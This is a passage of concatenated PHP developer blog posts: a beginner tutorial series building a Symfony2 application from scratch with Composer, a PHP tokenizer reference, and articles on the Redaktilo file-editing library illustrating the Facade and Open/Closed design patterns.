methods to check the type of the response, but usually you'll just want to make
sure the response is successful.
You can find other types of responses:
- JsonResponse: sets the Content-Type and converts the content into JSON
- BinaryFileResponse: sets headers and attaches a file to the response
- RedirectResponse: sets the target location for a redirection
- StreamedResponse: useful for streaming large files

Symfony2 is an HTTP framework whose primary public API is the controllers: they receive a Request as a parameter and return a Response. All you have to do is create a controller, write some configuration in order to link it to a URL, and you're done!
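To give a feel for two of these classes, here are minimal instantiations (the status code and target URL are made up for the example):

```php
<?php

use Symfony\Component\HttpFoundation\JsonResponse;
use Symfony\Component\HttpFoundation\RedirectResponse;

// Converts the array to JSON and sets Content-Type: application/json.
$json = new JsonResponse(array('answer' => 'Ni'), 422);

// Sets the Location header; the status code defaults to 302.
$redirect = new RedirectResponse('/api/ni');
```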
Do not forget to commit your work:
git add -A
git commit -m 'Created Ni route and controller'
The next article should be about tests: stay tuned!
Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
This is the third article of the series on learning the Symfony2 framework. Have a look at the two first ones:
In the previous articles we began to create an empty application with the following files:
.
├── app
│ ├── AppKernel.php
│ ├── cache
│ │ └── .gitkeep
│ ├── config
│ │ └── config.yml
│ └── logs
│ └── .gitkeep
├── composer.json
├── composer.lock
├── .gitignore
└── web
└── app.php
Running composer install should create a vendor directory, which we ignored
with git.
Here's the repository where you can find the actual code.
We'll now see what a bundle is.
We'll need some use case in order for our code snippets to make sense. So here it is: the Knights Who Say 'Ni' demand a webservice! It shall say 'ni' if the user does not appease it. To do so, the user should post a shrubbery!
Let's create our application bundle, in order to have a place where we can put our code. To do so we need to create the directory:
mkdir -p src/Knight/ApplicationBundle
Then the class extending Symfony\Component\HttpKernel\Bundle\Bundle:
<?php
// File: src/Knight/ApplicationBundle/KnightApplicationBundle.php
namespace Knight\ApplicationBundle;
use Symfony\Component\HttpKernel\Bundle\Bundle;
class KnightApplicationBundle extends Bundle
{
}
Finally we register the bundle into our application:
<?php
// File: app/AppKernel.php
use Symfony\Component\HttpKernel\Kernel;
use Symfony\Component\Config\Loader\LoaderInterface;
class AppKernel extends Kernel
{
public function registerBundles()
{
return array(
new Symfony\Bundle\FrameworkBundle\FrameworkBundle(),
new Knight\ApplicationBundle\KnightApplicationBundle(), // <-- Here!
);
}
public function registerContainerConfiguration(LoaderInterface $loader)
{
$loader->load(__DIR__.'/config/config.yml');
}
}
Let's commit our work:
git add -A
git commit -m 'Created Application bundle'
The KnightApplicationBundle class extends the following one:
<?php
namespace Symfony\Component\HttpKernel\Bundle;
use Symfony\Component\DependencyInjection\ContainerAware;
use Symfony\Component\Console\Application;
abstract class Bundle extends ContainerAware implements BundleInterface
{
public function getContainerExtension();
public function registerCommands(Application $application);
}
Note: Only the part we're interested in is shown here.
Those two methods make the bundle capable of autodiscovering its commands and its Dependency Injection Container's (DIC) extension, if the following directory structure is used:
.
├── Command
│ └── *Command.php
├── DependencyInjection
│ └── KnightApplicationExtension.php
└── KnightApplicationBundle.php
Note: the only file required in a bundle is the KnightApplicationBundle.php
one.
The name of a bundle (in our example KnightApplication) is composed of:
- the vendor name (Knight)
- the bundle name (Application)

For your own sake, choose a small one-word name for your vendor name and for your bundle name (there's no hard rule but that's my advice).
The KnightApplicationExtension class allows you to manipulate the DIC (most
often you'll load a configuration file, which can be located in
Resources/config/services.xml).
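A minimal extension of that kind could look like this (a sketch assuming the conventional Resources/config/services.xml location — our Knight application doesn't actually need one yet):

```php
<?php
// File: src/Knight/ApplicationBundle/DependencyInjection/KnightApplicationExtension.php

namespace Knight\ApplicationBundle\DependencyInjection;

use Symfony\Component\Config\FileLocator;
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\DependencyInjection\Loader\XmlFileLoader;
use Symfony\Component\HttpKernel\DependencyInjection\Extension;

class KnightApplicationExtension extends Extension
{
    public function load(array $configs, ContainerBuilder $container)
    {
        // Registers the bundle's services in the application's DIC.
        $loader = new XmlFileLoader(
            $container,
            new FileLocator(__DIR__.'/../Resources/config')
        );
        $loader->load('services.xml');
    }
}
```

Thanks to the naming convention described above, the bundle autodiscovers this class without any extra wiring.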
And that's precisely the purpose of bundles: registering services in the application's DIC.
Services and Dependency Injection isn't in the scope of this series. However if you want to discover what it is all about, have a look at these two articles:
Note: this is a kindly reminder about the nature of Symfony2 Components. Those are third party libraries which can be used on their own outside of the framework.
The Symfony2 Console Component allows you to create CLI applications. This application can have one or many commands. To learn more about them, have a look at this article:
Note: commands aren't in the scope of this article, but they're worth mentioning.
There are two kinds of bundles: those integrating a third party library into Symfony2 applications, and those integrating your own code.
Let's take the KnpLabs snappy library: it allows you to generate a PDF from an HTML page and can be used in any application (non-Symfony2 ones, and even framework-less ones).
The class allowing this generation is
Knp\Bundle\SnappyBundle\Snappy\LoggableGenerator: its construction is a bit
tiresome. To fix this, we can define its construction inside the DIC and
fortunately there's already a bundle doing it for us:
KnpSnappyBundle.
That's a good example of the first kind of bundles.
Now about the second kind: in our Symfony2 application, we'll need to integrate our own code one day or another. We could go the long and painful way (writing a lot of boilerplate code and configuration), or we could use a bundle to do the job automatically for us!
Sometimes, we'll find applications which have many bundles in order to categorize them into modules. This isn't necessary and it's a bit tiresome if you ask me: we can simply create folders in a unique bundle to categorize our modules.
The creation of many bundles necessitates some extra manual steps. It also makes little sense as a bundle is supposed to be a decoupled unit: if we create a UserBundle, FrontendBundle, BlogBundle and ForumBundle, we'll find ourselves with bundles depending on one another, often with cyclic dependencies and we'll waste time wondering where to put new classes (which can rely on 3 bundles).
My advice: create a single bundle for your application. If later on you find that inside it you created a set of classes which makes sense in other projects (Symfony2 and non-Symfony2 ones alike), then maybe you can extract them to create a third party library. And then you might create a bundle to integrate it inside Symfony2 applications.
Bundles are a way to extend the Dependency Injection Container: they're the glue layer between your code and Symfony2 applications.
They follow conventions which aren't hard coded (you can override anything), allowing them to autodiscover some convenient classes.
Thanks for reading, in the next article, we'll create controllers!
Here's a good article about how reusable bundles should be created:
You don't like the conventions and you're ready to write a lot of boilerplate code and configuration? Here you go (I'd not advise you to do so, though):
I'm only putting these links because I like how they explain how Symfony2 works under the hood, but I wouldn't apply them in a real world application as it makes too much fuss to no avail (that's my humble opinion anyway).
Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
This is the second article of the series on learning the Symfony2 framework. Have a look at the first one: Composer.
In the first article we began to create an empty project with the following files:
.
├── composer.json
├── composer.lock
└── .gitignore
Running composer install should create a vendor directory, which we ignored
in git.
Here's the repository where you can find the actual code.
We'll now see how to create an empty Symfony2 application.
First things first, we will create an index file which will act as a front controller: it will be the only entry point of our application and will decide which page to display.
Create its directory:
mkdir web
Then the file:
<?php
// File: web/app.php
use Symfony\Component\HttpFoundation\Request;
require_once __DIR__.'/../vendor/autoload.php';
require_once __DIR__.'/../app/AppKernel.php';
$kernel = new AppKernel('prod', false);
$request = Request::createFromGlobals();
$response = $kernel->handle($request);
$response->send();
$kernel->terminate($request, $response);
First it includes Composer's autoloader: it will require every file needed.
Then we create an instance of our Kernel with the production environment and the debug utilities disabled. This class acts like a web server: it takes an HTTP request as input and returns an HTTP response as output.
Request::createFromGlobals() creates a representation of the HTTP request.
It is filled from PHP's variable super globals ($_GET, $_POST, etc).
The kernel then handles the request. To keep explanations short, let's simply
say that it will find the controller associated to the requested URL. It is the
controller's responsibility to return a representation of the HTTP response (see
Symfony\Component\HttpFoundation\Response).
The $response->send() method will simply call the PHP header function and
print a string representing the response's body (usually HTML, JSON or anything
you want).
Finally the $kernel->terminate() method will call any tasks which registered
to the kernel.terminate event. This allows you to return a response as fast as
possible and then execute some actions, like sending emails.
Note: events aren't in the scope of this article, but they're worth mentioning.
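For the curious, a task hooked on that event could look like this (a hypothetical listener, shown only to make the idea concrete — our application doesn't need one):

```php
<?php

use Symfony\Component\HttpKernel\Event\PostResponseEvent;

class SendEmailsListener
{
    // Called after the response has already been sent to the client.
    public function onKernelTerminate(PostResponseEvent $event)
    {
        // Heavy work (e.g. actually sending queued emails) happens here,
        // without delaying the HTTP response.
    }
}

// The service would then be tagged in the bundle's configuration with:
// { name: kernel.event_listener, event: kernel.terminate }
```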
The HttpKernel component
provides you with a Kernel class, which we will extend.
Create the following directory:
mkdir app
And then the kernel file:
<?php
// File: app/AppKernel.php
use Symfony\Component\HttpKernel\Kernel;
use Symfony\Component\Config\Loader\LoaderInterface;
class AppKernel extends Kernel
{
public function registerBundles()
{
return array(
new Symfony\Bundle\FrameworkBundle\FrameworkBundle(),
);
}
public function registerContainerConfiguration(LoaderInterface $loader)
{
$loader->load(__DIR__.'/config/config.yml');
}
}
This class will load the project's configuration. This is also where you register the project's bundles. We'll talk more about bundles in the next article, for now the only thing you need to know is that they're like plugins.
The Kernel has the responsibility to look at every registered bundle to retrieve their configuration.
The FrameworkBundle defines some services and allows you to choose what to
enable via configuration.
Note: Services are objects which do one thing and do it well. They provide exactly what they're called: a service. We'll learn more about them in one of the next articles.
We need to add some configuration to make it work properly.
Create its directory:
mkdir app/config
And then the YAML file:
# File: app/config/config.yml
framework:
secret: "Three can keep a secret, if two of them are dead."
The secret parameter is used as a seed to generate random strings (e.g.
CSRF tokens).
Now that we have our application structure, let's commit it:
git add -A
git commit -m 'Created application structure'
You'll also need to create logs and cache directories:
mkdir app/{cache,logs}
touch app/{cache,logs}/.gitkeep
Git doesn't allow committing empty directories, hence the .gitkeep files.
Because files in these directories are temporary, we'll ignore them:
echo '/app/cache/*' >> .gitignore
echo '/app/logs/*' >> .gitignore
git add -A
git add -f app/cache/.gitkeep
git add -f app/logs/.gitkeep
git commit -m 'Created temporary directories'
In order for your website to be browsed, you'll need to configure your web server. This configuration is well explained in the documentation, so here's a dump of an apache vhost:
<VirtualHost *:80>
ServerName knight.local
DocumentRoot /home/loic.chardonnet/Projects/gnugat/knight/web
ErrorLog "/home/loic.chardonnet/Projects/gnugat/knight/app/logs/apache_errors.log"
CustomLog "/home/loic.chardonnet/Projects/gnugat/knight/app/logs/apache_accesses.log" common
<Directory /home/loic.chardonnet/Projects/gnugat/knight/web>
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*)$ /app.php [QSA,L]
</IfModule>
</Directory>
</VirtualHost>
If you run into permission problems (like writing in cache and logs),
you might consider changing the APACHE_RUN_USER and APACHE_RUN_GROUP
environment variables present in /etc/apache2/envvars to your own user and
group.
A Symfony2 application follows this pattern: a front controller associates a URL with a controller, which takes an HTTP request and returns an HTTP response.
The next article will be all about bundles, so stay tuned :) .
Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
You don't know anything about the Symfony2 framework, and you'd like a quick guide to learn how to use it, and how it works?
Then this article is for you :) .
Don't get me wrong: one day or another you'll have to read the documentation, and you'll have to practice a lot in order to master it. But for now this guide should be a good start for you.
In the first article of this series, you'll learn about Composer, which helps you with third party library installation and updates.
In order to understand how Symfony2 works, we won't use the Symfony Standard Edition, but rather start from scratch with the bare minimum.
Let's create our project:
mkdir knight
cd knight
git init
When developing a project the last thing you want is to waste your time re-inventing the wheel, so you install third party libraries. Those libraries have their own life cycle: they might release some bug fixes and new features after you installed them, so you'll need to update them sometimes.
Composer makes these things so easy you'll never have to worry again about versions. First download it:
curl -sS https://getcomposer.org/installer | php
sudo mv composer.phar /usr/local/bin/composer
And we're done! If only every project were so easy to install... :)
Actually, Symfony2 is just a name grouping many libraries which can be used individually (you can even use them in other frameworks, CMSes or projects, like Drupal, phpBB, Laravel, eZ Publish, OroCRM and Piwik did).
Note: Symfony2 libraries are called components.
Composer was made to install libraries, so let's use it:
composer require 'symfony/symfony:~2.5' # install every single library in Symfony2
This command will do the following steps:
This command will go through the following steps:
- create a composer.json configuration file if it doesn't already exist
- add symfony/symfony: ~2.5 in it (useful for further composer install runs)
- download the library into the vendor/symfony/symfony directory
- create a composer.lock file

Later on, to update those dependencies you'll just have to run composer update.
Note: a library you depend upon is called a dependency.
This will look in the composer.lock file to know which version has been installed (e.g. 2.5.0) and then check if there's any new version available.
For more information about how Composer handles versions, see
Igor's article.
This means that you can totally ignore the vendor directory:
echo '/vendor/*' >> .gitignore
If your team wants to install your project, they'll just have to clone your
repository and then run composer install, which goes through the following steps:
- read the composer.json file to see the list of dependencies
- read the composer.lock file to check the versions installed by the committer
- download and install those exact versions

If a dependency is listed in composer.json but not in composer.lock, Composer will download the latest matching version and add it to the lock.
This means that everyone will have the same version installed! If you allow only
one person to run composer update you can guarantee this.
Because Composer knows where each class of the installed libraries is located, it provides a nice feature: autoloading.
Simply put, the first time a class is used, Composer will automatically include the file where it's declared.
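The mechanism can be sketched with PHP's `spl_autoload_register`. This is a deliberately simplified, hypothetical version of what Composer's generated `vendor/autoload.php` does, not its actual code:

```php
<?php
// Simplified sketch of Composer's autoloading: when an unknown class is
// referenced for the first time, PHP calls the registered callback, which
// maps the class name to a file path and includes it.
function registerSimpleAutoloader($baseDir)
{
    spl_autoload_register(function ($class) use ($baseDir) {
        $file = $baseDir.'/'.str_replace('\\', '/', $class).'.php';
        if (is_file($file)) {
            require $file;
        }
    });
}
```

With this in place, `new \Knight\Greeter()` would trigger the callback and include `$baseDir/Knight/Greeter.php` automatically.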
Your own code too can benefit from it. We just need to edit the composer.json
file:
{
"require": {
"symfony/symfony": "~2.5"
},
"autoload": {
"psr-4": {
"": "src/"
}
}
}
And run the following command to take the changes into account:
composer update
This tells Composer that we're going to follow the
PSR-4 standard and that we're going to put
our sources in the src directory.
Note: PSR-4 requires the fully qualified class name (namespace included) to match the path of the file declaring it.
For example: the file src/Knight/ApplicationBundle/KnightApplicationBundle.php
contains a class named KnightApplicationBundle located in the namespace
Knight\ApplicationBundle.
Don't worry too much about it for now.
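For the curious, the PSR-4 mapping rule used above can be sketched as a tiny helper function (hypothetical, not part of Composer): the `''` namespace prefix maps to `src/`, and the rest of the fully qualified class name becomes the file path.

```php
<?php
// Hypothetical helper: turn a fully qualified class name into the file
// path where PSR-4 expects to find it, given the '' => 'src/' mapping.
function psr4Path($class, $baseDir = 'src/')
{
    return $baseDir.str_replace('\\', '/', ltrim($class, '\\')).'.php';
}

echo psr4Path('Knight\ApplicationBundle\KnightApplicationBundle');
// src/Knight/ApplicationBundle/KnightApplicationBundle.php
```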
And that's everything you need to know about Composer for now. Let's commit our work:
git add -A
git commit -m 'Installed Symfony2'
I hope this could help you, stay tuned for the next articles!
While I don't mind the "learn by practice" approach (that's actually my favorite way of learning), it's inconvenient as you might have to re-discover things when using it again two months later.
To fix this, I'll try to provide a small reference guide in this article.
A token is just a unique identifier allowing you to define what you're manipulating: PHP keywords, function names, whitespace and comments are all represented as tokens.
If you want to programmatically read a PHP file, analyze its source code and possibly manipulate it and save the changes, then tokens will make your life easier.
Here are some actual examples of what tokens are used for:
The Tokenizer extension provides token_get_all($source), which takes a string
containing PHP source code and makes an array of tokens and related information
out of it.
Here's an example:
<?php
$code =<<<'EOF'
<?php
/**
* @param string $content
*/
function strlen($content)
{
for ($length = 0; isset($content[$length]); $length++);
return $length;
}
EOF;
$tokens = token_get_all($code);
Should produce:
$tokens = array(
// Either a string or an array with 3 elements:
// 0: code, 1: value, 2: line number
// Line 1
array(T_OPEN_TAG, "<?php\n", 1),
// Line 2
array(T_WHITESPACE, "\n", 2),
// Lines 3, 4 and 5
array(T_DOC_COMMENT, "/**\n * @param string $content\n */", 3), // On many lines
array(T_WHITESPACE, "\n", 5),
// Line 6
array(T_FUNCTION, "function", 6),
array(T_WHITESPACE, " ", 6), // Empty lines and spaces are the same: whitespace
array(T_STRING, "strlen", 6),
"(", // yep, no token nor line number...
array(T_VARIABLE, "$content", 6),
")",
array(T_WHITESPACE, "\n", 6),
"{",
// Line 7
array(T_WHITESPACE, "\n", 7),
// Line 8
array(T_FOR, "for", 8),
array(T_WHITESPACE, " ", 8),
"(",
array(T_VARIABLE, "$length", 8),
array(T_WHITESPACE, " ", 8),
"=",
array(T_WHITESPACE, " ", 8),
array(T_LNUMBER, "0", 8),
";",
array(T_WHITESPACE, " ", 8),
array(T_ISSET, "isset", 8),
"(",
array(T_VARIABLE, "$content", 8),
"[",
array(T_VARIABLE, "$length", 8),
"]",
")",
";",
array(T_WHITESPACE, " ", 8),
array(T_VARIABLE, "$length", 8),
array(T_INC, "++", 8),
")",
";",
array(T_WHITESPACE, "\n\n", 8), // Double new line in one token
// Line 10
array(T_RETURN, "return", 10),
array(T_WHITESPACE, " ", 10),
array(T_VARIABLE, "$length", 10),
";",
array(T_WHITESPACE, "\n", 10),
"}",
);
As you can see, some things might seem odd, but once you know them you can
start manipulating the tokens. You should rely only on the constants, because
their values might vary between versions (e.g. T_OPEN_TAG is 376 in PHP 5.6
and 374 in 5.5).
If you want to display a readable representation of the token's constant values,
use token_name($token).
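Putting the two functions together, a short loop can dump a readable representation of any snippet (single-character tokens are plain strings, so they're printed as-is):

```php
<?php
// Dump each token with its constant name: token_name() turns the token's
// integer constant into its readable name (e.g. T_ECHO).
$tokens = token_get_all('<?php echo strlen("Ni!");');
foreach ($tokens as $token) {
    if (is_array($token)) {
        echo token_name($token[0]), ' => ', var_export($token[1], true), PHP_EOL;
    } else {
        echo $token, PHP_EOL; // single-character tokens are plain strings
    }
}
```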
Here are some resources you might find interesting:
Since the announcement of Redaktilo on this blog, this silly library has jumped from 164 lines of code in v0.3 to 571 in v0.7.
In this article:
Thanks to WouterJ you can now:
Thanks to WouterJ you can now:
- remove a line: $editor->remove($file);
- change the current line: $editor->changeTo($file, $replacement);
- replace matches with a callback: $editor->replaceWith($file, $regex, $callback);
- check a pattern's presence: $editor->has($file, $pattern);

I've updated the documentation to make the library easier to learn, with:
Redaktilo has been created to fulfill actual needs. To make sure it keeps this promise, I've added executable examples using PHPUnit tests.
The major changes have been massive refactorings to allow the library to be extended:
As highlighted by Clément Herreman, those refactorings have introduced a more complex construction schema. To make things easier, a static Dependency Injection Container has been created.
Sublime Text's go to anything feature is really awesome, which is why I'd like to implement something similar:
- exact line search (array_search)
- substring search (strpos)
- regular expression search (preg_grep)
- PHP token search (token_get_all)

The first two are already available; the others still have to be implemented (the last one might be done by Loick Piera).
The methods allowing this throw an exception when nothing is found. Adding
relative checks (hasBefore and hasAfter) might make things easier.
Moving relatively isn't always sufficient. To go to an absolute line number
you currently have to use File directly; maybe it would be nicer to add a new
method to Editor (jumpToFirst).
Finally, the editor should allow insertion, replacement and removal in any locations, not just on the current line.
Once these features are added, more refactoring should take place: since the
creation of Redaktilo, Jean-François Simon
advised me to use the Command and Memento patterns, which would allow an
undo/redo feature.
While I now think that Command is indeed more suitable than ReplaceStrategy
for insertion, replacement and removal, I'm not sure the versioning feature
is actually needed... For now.
And that should bring us near an alpha version :) .
A lot of renaming should happen at this stage:
- changeTo to replace
- replaceWith to replaceAll
- NotSupportedException to NotFoundException

And perhaps some other method or class names.
Once the heavy renaming is done, beta versions can begin, with a main focus on making everything safer (argument checking, exception handling).
I'm still not fully sure of what Redaktilo v1.0 will look like, mainly because I still haven't answered this question (which has been on my mind since the beginning):
Should Redaktilo handle different kinds of files?
Sometimes I think it should, which is why the project has seen:
The motive behind this is the JSON use case: you can currently edit JSON files, but it's tedious.
Let's take the composer.json example. What if you need to add a script when:
- there isn't any scripts section yet?
- the section doesn't contain any script yet?

Another example would be the addition of a new element in an array: you currently have to manually add a trailing comma to the previous entry...
Redaktilo fulfills 98% of my use cases (inserting new lines in a YAML configuration file, editing PHP files and replacing bits in a documentation file) and is now extensible.
Some search strategies will be added to make it similar to the Sublime Text's go to anything, and some refactoring are still necessary before an alpha version.
There's still some unresolved questions (JSON edition is the 2% use case left), but I'm sure they'll be answered during the development.
In the end, Editor should have the following methods (no guarantee on the
names):
I'd like to thank the early contributors:
Any help is appreciated, whether it's some code review, typo fixing or code/documentation contribution. But the biggest help you could give me: provide me with some feedback on Redaktilo's usage :) .
If you have any questions, remarks, please feel free to open an issue and start a discussion here.
Sometimes, you just want to hide low level complexity behind a unique interface which communicates a high level policy. The Facade design pattern is all about this.
In this article, we'll see a real world example with Redaktilo.
Redaktilo provides an object oriented way to manipulate files. For example you can open existing ones, or create new ones:
<?php
require_once __DIR__.'/vendor/autoload.php';
use Gnugat\Redaktilo\DependencyInjection\StaticContainer;
$filesystem = StaticContainer::makeFilesystem();
$filename = '/tmp/monthy.py';
if ($filesystem->exists($filename)) {
$file = $filesystem->open($filename);
} else {
$file = $filesystem->create($filename);
}
// ...
The main interest in this library lies in manipulations you can do, for example jumping to a line and adding a new one under it:
<?php
// ...
$lineSearchStrategy = StaticContainer::makeLineSearchStrategy();
$lineReplaceStrategy = StaticContainer::makeLineReplaceStrategy();
$lineNumber = $lineSearchStrategy->findNext($file, 'if Knight.saysNi():');
$lineReplaceStrategy->insertAt($file, $lineNumber, ' print "Ni!"');
// ...
Finally, you need to actually save the changes (until now they were only done in memory):
// ...
$filesystem->write($file);
The Filesystem and Search/Replace strategies are low level APIs and require a lot of boilerplate code to do every day tasks.
What if we provided a unique interface in front of those services? One that would be in a higher level, say a text editor metaphor for instance?
<?php
require_once __DIR__.'/vendor/autoload.php';
use Gnugat\Redaktilo\DependencyInjection\StaticContainer;
$editor = StaticContainer::makeEditor();
$filename = '/tmp/monthy.py';
$file = $editor->open($filename, true); // Force file creation.
$editor->jumpDownTo($file, 'if Knight.saysNi():');
$editor->addAfter($file, ' print "Ni!"');
$editor->save($file);
You don't need to take care of every service creation, and now you only have to learn a small set of methods. The text editor metaphor also provides you with a neat way to easily remember these methods!
Facades hide low level implementation by providing a unique high level API.
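The same idea can be shown in miniature. The classes below are hypothetical, not part of Redaktilo's API: two low-level services are hidden behind one high-level method.

```php
<?php
// Generic facade sketch: callers use DocumentFacade::show() and never
// touch Loader or Renderer directly.
class Loader
{
    public function load($name) { return "content of $name"; }
}

class Renderer
{
    public function render($text) { return strtoupper($text); }
}

class DocumentFacade
{
    private $loader;
    private $renderer;

    public function __construct(Loader $loader, Renderer $renderer)
    {
        $this->loader = $loader;
        $this->renderer = $renderer;
    }

    // The single high-level entry point.
    public function show($name)
    {
        return $this->renderer->render($this->loader->load($name));
    }
}

$facade = new DocumentFacade(new Loader(), new Renderer());
echo $facade->show('readme'); // CONTENT OF README
```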
Here's another blog post about this pattern, by Mike Ebert.
I hope you found this article interesting, if you have any questions or feedback please feel free to do so on Twitter.
This week I've read two articles, which have just been published, on the Open/Closed principle:
I'd like to add my small contribution to their explanation by providing a real world example: Redaktilo.
Let's say you have the following file:
Egg
Sausage
Bacon
Spam
Redaktilo provides an Editor class which allows you to jump to the line you
want, provided that you know exactly its content:
$editor->has($file, 'Bacon'); // true!
$editor->jumpDownTo($file, 'Bacon'); // Current line: Bacon
$editor->jumpUpTo($file, 'Sausage'); // Current line: Sausage
But what if you want to jump two lines under Sausage? You'd have to create
a new method:
$editor->moveDown($file, 2); // Current line: Spam
You have extended Editor by modifying it.
Having to fork a library to extend it doesn't feel natural. What does the Open/Closed principle say?
Software entities (classes, modules, functions, etc.) should be open for extension, but closed for modification.
Our Editor class is open to extension, but also to modification.
To fix this, we can transfer the responsibility of finding a pattern in the file
to a SearchStrategy:
<?php
namespace Gnugat\Redaktilo\Search;
use Gnugat\Redaktilo\File;
interface SearchStrategy
{
public function has(File $file, $pattern);
public function findNext(File $file, $pattern);
public function findPrevious(File $file, $pattern);
public function supports($pattern);
}
Here are some implementation ideas:
- LineSearchStrategy: looking for the exact line in the file
- LineNumberSearchStrategy: jumping to a line relative to the current one
- RegexpSearchStrategy: looking for a pattern in the file using regular expressions
- PhpTokenSearchStrategy: parsing PHP tokens

The supports method tells you that LineSearchStrategy needs $pattern to be
a string, but that RegexpSearchStrategy needs an Expression value object.
The responsibility to find a SearchStrategy which supports the given pattern
should be delegated to SearchEngine:
<?php
namespace Gnugat\Redaktilo\Search;
class SearchEngine
{
private $searchStrategies = array();
public function registerStrategy(SearchStrategy $searchStrategy)
{
$this->searchStrategies[] = $searchStrategy;
}
public function resolve($pattern)
{
foreach ($this->searchStrategies as $searchStrategy) {
if ($searchStrategy->supports($pattern)) {
return $searchStrategy;
}
}
throw new PatternNotSupportedException($pattern);
}
}
You no longer need to fork Redaktilo to add new search related behavior, you can
now just create a new implementation of SearchStrategy, register it into
SearchEngine and then inject it into the Editor:
use Gnugat\Redaktilo\Editor;
use Gnugat\Redaktilo\Filesystem;
use Gnugat\Redaktilo\Search\SearchEngine;
use Gnugat\Redaktilo\Search\LineNumberSearchStrategy;
use Gnugat\Redaktilo\Search\LineSearchStrategy;
use Symfony\Component\Filesystem\Filesystem as SymfonyFilesystem;
$searchEngine = new SearchEngine();
$lineSearchStrategy = new LineSearchStrategy();
$searchEngine->registerStrategy($lineSearchStrategy);
$lineNumberSearchStrategy = new LineNumberSearchStrategy();
$searchEngine->registerStrategy($lineNumberSearchStrategy);
$symfonyFilesystem = new SymfonyFilesystem();
$filesystem = new Filesystem($symfonyFilesystem);
$editor = new Editor($filesystem, $searchEngine);
We just made Redaktilo open to extension (still) and closed to modifications, hooray!
Here's what Editor looked like after adding moveDown:
<?php
namespace Gnugat\Redaktilo;
class Editor
{
public function jumpDownTo(File $file, $pattern)
{
$lines = $file->readlines();
$filename = $file->getFilename();
$currentLineNumber = $file->getCurrentLineNumber() + 1;
$length = count($lines);
while ($currentLineNumber < $length) {
if ($lines[$currentLineNumber] === $pattern) {
$file->setCurrentLineNumber($currentLineNumber);
return;
}
$currentLineNumber++;
}
throw new \Exception("Couldn't find line $pattern in $filename");
}
public function jumpUpTo(File $file, $pattern)
{
$lines = $file->readlines();
$filename = $file->getFilename();
$currentLineNumber = $file->getCurrentLineNumber() - 1;
while (0 <= $currentLineNumber) {
if ($lines[$currentLineNumber] === $pattern) {
$file->setCurrentLineNumber($currentLineNumber);
return;
}
$currentLineNumber--;
}
throw new \Exception("Couldn't find line $pattern in $filename");
}
public function moveUp(File $file, $lines = 1)
{
$newLineNumber = $file->getCurrentLineNumber() - $lines;
if ($newLineNumber < 0) {
$newLineNumber = 0;
}
$file->setCurrentLineNumber($newLineNumber);
}
public function has(File $file, $pattern)
{
return $file->hasLine($pattern);
}
}
And now, here's what it looks like:
<?php
namespace Gnugat\Redaktilo;
use Gnugat\Redaktilo\Search\SearchEngine;
class Editor
{
private $searchEngine;
public function __construct(SearchEngine $searchEngine)
{
$this->searchEngine = $searchEngine;
}
public function jumpDownTo(File $file, $pattern)
{
$searchStrategy = $this->searchEngine->resolve($pattern);
$foundLineNumber = $searchStrategy->findNext($file, $pattern);
$file->setCurrentLineNumber($foundLineNumber);
}
public function jumpUpTo(File $file, $pattern)
{
$searchStrategy = $this->searchEngine->resolve($pattern);
$foundLineNumber = $searchStrategy->findPrevious($file, $pattern);
$file->setCurrentLineNumber($foundLineNumber);
}
public function has(File $file, $pattern)
{
$searchStrategy = $this->searchEngine->resolve($pattern);
return $searchStrategy->has($file, $pattern);
}
}
You should be able to add new features without modifying existing code.
I hope you found this article interesting, if you have any questions or feedback please feel free to do so on Twitter.
I've been working on a silly library lately: Redaktilo (it means editor in Esperanto).
Redaktilo has been created to fulfill actual needs. In this article we'll see what it is all about, and why it won't stay silly for long.
Incenteev\ParameterHandler is a good example: it updates a YAML configuration after each update of the dependencies using Composer.
It uses the Symfony2 Yaml component which converts a YAML string into a PHP array, and then converts it back. The problem with it is that it strips empty lines, custom formatting and comments...
Redaktilo only inserts a new line in the file, leaving it as it is.
The composer.json file is really useful and can be almost completely edited
using the composer.phar CLI application.
Some parts still need manual editing, like the script section. To automate this
you could use json_decode and json_encode, but similarly to the previous use
case you would lose empty lines and custom formatting...
Redaktilo aims at solving this problem, but isn't ready yet: inserting a line in JSON often means adding a comma at the end of the previous one.
To be fair this use case isn't limited to PHP source code: it can be useful for any plain text files (text, XML, java, python, anything).
GnugatWizardBundle automatically registers new bundles installed using Composer in your Symfony2 application.
To do so it uses
SensioGeneratorBundle's
KernelManipulator
to insert a line in app/AppKernel.php. However this class registers bundles for every
environment, and doesn't take into account bundles which depend on the kernel.
If you take a look at the KernelManipulator source code, you'll realise it has been a bit over-engineered, as it parses PHP tokens.
A new KernelManipulator could be written using Redaktilo as follows:
<?php
namespace Sensio\Bundle\GeneratorBundle\Manipulator;
use Gnugat\Redaktilo\Editor;
class KernelManipulator extends Manipulator
{
protected $editor;
protected $appKernelFilename;
public function __construct(Editor $editor, $appKernelFilename)
{
$this->editor = $editor;
$this->appKernelFilename = $appKernelFilename;
}
public function addBundle($bundle)
{
$file = $this->editor->open($this->appKernelFilename);
$newLine = sprintf(' new %s(),', $bundle);
$this->editor->jumpDownTo($file, '    public function registerBundles()');
$this->editor->jumpDownTo($file, '        $bundles = array(');
$this->editor->jumpDownTo($file, '        );');
$this->editor->addBefore($file, $newLine);
$this->editor->save($file);
return true;
}
}
A great effort has been put to document the project, as you can see in the README.
Here's an overview!
You can install Redaktilo using Composer:
composer require "gnugat/redaktilo:~0.3@dev"
Then you need to create an instance of the Editor class:
<?php
require_once __DIR__.'/vendor/autoload.php';
use Gnugat\Redaktilo\Filesystem;
use Gnugat\Redaktilo\Editor;
use Symfony\Component\Filesystem\Filesystem as SymfonyFilesystem;
$symfonyFilesystem = new SymfonyFilesystem();
$filesystem = new Filesystem($symfonyFilesystem);
$editor = new Editor($filesystem);
Editor is completely stateless, which means you can use the same instance
everywhere in your scripts/applications/libraries.
Let's now have a look at the available classes and their responsibility.
The basic idea behind Redaktilo is to provide an object oriented way to represent files:
<?php
namespace Gnugat\Redaktilo;
class File
{
public function getFilename();
public function read();
public function write($newContent);
// ...
}
Once this domain model available, you can build services to manipulate it.
This is the first service available:
<?php
namespace Gnugat\Redaktilo;
class Filesystem
{
public function open($filename); // Cannot open new files
public function create($filename); // Cannot create existing files
